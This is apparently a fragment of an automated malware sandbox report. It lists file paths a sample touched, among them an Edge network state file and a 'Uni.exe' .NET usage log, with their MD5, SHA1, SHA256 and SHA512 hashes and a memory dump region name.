C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4df4574bfbb7e0b0bc56c2c9b12b6c47 |
| SHA1 | 81efcbd3e3da8221444a21f45305af6fa4b71907 |
| SHA256 | e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377 |
| SHA512 | 78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/668-189-0x0000000002440000-0x000000000244C000-memory.dmp